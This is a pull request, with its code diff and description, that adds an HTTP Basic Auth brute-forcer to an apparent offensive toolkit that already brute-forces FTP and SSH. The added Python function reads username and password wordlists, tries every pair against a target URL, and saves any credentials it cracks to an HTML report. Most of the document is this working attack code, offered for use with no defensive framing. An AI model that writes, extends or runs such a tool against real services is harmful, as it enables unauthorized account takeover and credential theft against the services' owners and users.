### PR TITLE
feat: Add HTTP Basic Auth bruteforcer

### DIFF
--- a/core/brute.py
+++ b/core/brute.py
@@ -1,6 +1,8 @@
 import ftplib
 import os
 import paramiko
+import requests # Added for HTTP requests
+from requests.auth import HTTPBasicAuth # Added for Basic Auth
 from datetime import datetime
 import time
 import random
@@ -136,12 +138,81 @@ def run_ssh_bruteforce():
     input("Press Enter to return...")
 
 
+def run_http_bruteforce():
+    clear()
+    print("\n🔐 [HTTP Basic Auth Brute-Force]")
+
+    target_url = input("Enter Target URL (e.g., http://example.com/protected): ").strip()
+    userlist_path = input("Path to username wordlist (e.g. wordlists/users.txt): ").strip()
+    passlist_path = input("Path to password wordlist (e.g. wordlists/passwords.txt): ").strip()
+
+    if not os.path.exists(userlist_path) or not os.path.exists(passlist_path):
+        print("[❌] Wordlist file(s) not found.")
+        input("Press Enter to return...")
+        return
+
+    try:
+        with open(userlist_path, 'r', encoding='utf-8', errors='ignore') as ufile:
+            usernames = [u.strip() for u in ufile if u.strip()]
+        with open(passlist_path, 'r', encoding='utf-8', errors='ignore') as pfile:
+            passwords = [p.strip() for p in pfile if p.strip()]
+    except Exception as e:
+        print(f"[❌] Error reading files: {e}")
+        input("Press Enter to return...")
+        return
+
+    if not usernames or not passwords:
+        print("[❌] Wordlists cannot be empty.")
+        input("Press Enter to return...")
+        return
+
+    print(f"\n[🔍] Starting HTTP Basic Auth brute-force on {target_url}...\n")
+
+    for username in tqdm(usernames, desc="Usernames", unit="user"):
+        for password in tqdm(passwords, desc="Passwords", unit="pass", leave=False):
+            try:
+                response = requests.get(target_url, auth=HTTPBasicAuth(username, password), timeout=5)
+
+                if response.status_code == 200:
+                    print(f"\n[✅] SUCCESS: {username}:{password} (Status: {response.status_code})")
+                    lines = [
+                        f"Target URL: {target_url}",
+                        f"Service: HTTP Basic Auth",
+                        f"Credentials: {username}:{password}"
+                    ]
+                    write_html_section("Brute-Force Results", lines)
+                    print("[💾] Appended to report.html")
+                    input("Press Enter to return...")
+                    return
+                elif response.status_code == 401:
+                    tqdm.write(f"[❌] Failed: {username}:{password} (Status: {response.status_code} Unauthorized)")
+                elif response.status_code == 403:
+                    tqdm.write(f"[❌] Failed: {username}:{password} (Status: {response.status_code} Forbidden)")
+                else:
+                    tqdm.write(f"[⚠️ ] Info: {username}:{password} (Status: {response.status_code})")
+
+            except requests.exceptions.ConnectionError:
+                tqdm.write(f"[❌] Error: Could not connect to {target_url}. Check URL and connection.")
+                input("Press Enter to return...")
+                return
+            except requests.exceptions.Timeout:
+                tqdm.write(f"[⚠️ ] Timeout connecting to {target_url} for {username}:{password}. Retrying may be needed or increase timeout.")
+            except requests.exceptions.RequestException as e:
+                tqdm.write(f"[❌] Error for {username}:{password}: {e}")
+
+            # Small delay to avoid overwhelming the server, can be adjusted
+            time.sleep(0.1)
+
+    print("\n[❌] No valid credentials found.")
+    input("Press Enter to return...")
+
 
 def run():
     print("🔐 Brute-Force Toolkit") 
     print("[1] FTP Brute-Force")
     print("[2] SSH Brute-Force")
-    print("[3] Back")
+    print("[3] HTTP Basic Auth Brute-Force")
+    print("[4] Back")
     choice = input("Select an option: ").strip()
 
     if choice == '1':
@@ -149,4 +220,6 @@ def run():
     elif choice == '2':
         run_ssh_bruteforce()
     elif choice == '3':
+        run_http_bruteforce()
+    elif choice == '4':
         return

--- a/requirements.txt
+++ b/requirements.txt
@@ -16,3 +16,6 @@ paramiko>=2.9.0
 
 # Network interface detection and system network info
 netifaces>=0.11.0
+
+# HTTP library for making requests (used in HTTP bruteforcer)
+requests>=2.20.0


### PR DESCRIPTION
- Implemented `run_http_bruteforce` function in `core/brute.py` to perform username and password-based brute-force attacks against HTTP Basic Authentication.
- The function prompts for target URL, username list, and password list.
- Uses the `requests` library for HTTP requests.
- Logs successful attempts to `report.html`.
- Updated the main menu in `core/brute.py` to include the new HTTP bruteforcer.
- Added `requests` to `requirements.txt`.